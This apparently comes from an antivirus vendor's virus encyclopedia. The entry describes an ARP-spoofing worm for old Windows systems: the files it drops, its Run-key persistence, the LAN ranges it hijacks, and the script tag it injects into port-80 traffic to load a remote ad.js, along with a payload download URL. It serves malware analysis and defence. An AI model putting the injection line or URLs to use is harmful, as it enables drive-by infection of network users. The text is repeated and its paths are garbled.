金山毒霸2009
金山清理专家
专杀工具
在线杀毒
密保
网盾
系统急救箱
ARP防火墙
本病毒所有命名:
影响系统:
Win9x,WinMe
简介:
1.复制自身至 %sys32dir%driverssvchost.exe 释放 %sys32dir%Packet.dll %sys32dir%WanPacket.dll %sys32dir%wpcap.dll %sys32dir%drivers pf.sys %sys32dir%driversscvhost.exe
行为分析:
该病毒是一个具有ARP欺骗攻击的病毒。病毒运行后会复制自身至系统文件夹,然后释放病毒文件,生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据,修改网页源码,下载大量隐蔽软件安装至用户计算机。
:
影响系统:
Win9x,WinMe
简介:
1.复制自身至 %sys32dir%driverssvchost.exe 释放 %sys32dir%Packet.dll %sys32dir%WanPacket.dll %sys32dir%wpcap.dll %sys32dir%drivers pf.sys %sys32dir%driversscvhost.exe
行为分析:
该病毒是一个具有ARP欺骗攻击的病毒。病毒运行后会复制自身至系统文件夹,然后释放病毒文件,生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据,修改网页源码,下载大量隐蔽软件安装至用户计算机。
描述:
1.复制自身至
%sys32dir%driverssvchost.exe
释放
%sys32dir%Packet.dll
%sys32dir%WanPacket.dll
%sys32dir%wpcap.dll
%sys32dir%drivers
pf.sys
%sys32dir%driversscvhost.exe
2.生成启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun KVP "%sys32dir%driverssvchost.exe"
3.发送 ARP 欺骗扫描局域网,劫持
172.16
192.10
10.0
开头的IP段,向发送至80端口的数据包中插入
< script language="javascript" src="http://flyget.8800.org/ad.js">
4.下载大量隐蔽软件安装至用户计算机
hxxp://flyget.8800.org/xxx.exe
1.复制自身至
%sys32dir%driverssvchost.exe
释放
%sys32dir%Packet.dll
%sys32dir%WanPacket.dll
%sys32dir%wpcap.dll
%sys32dir%drivers
pf.sys
%sys32dir%driversscvhost.exe
2.生成启动项
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun KVP "%sys32dir%driverssvchost.exe"
3.发送 ARP 欺骗扫描局域网,劫持
172.16
192.10
10.0
开头的IP段,向发送至80端口的数据包中插入
< script language="javascript" src="http://flyget.8800.org/ad.js">
4.下载大量隐蔽软件安装至用户计算机
hxxp://flyget.8800.org/xxx.exe
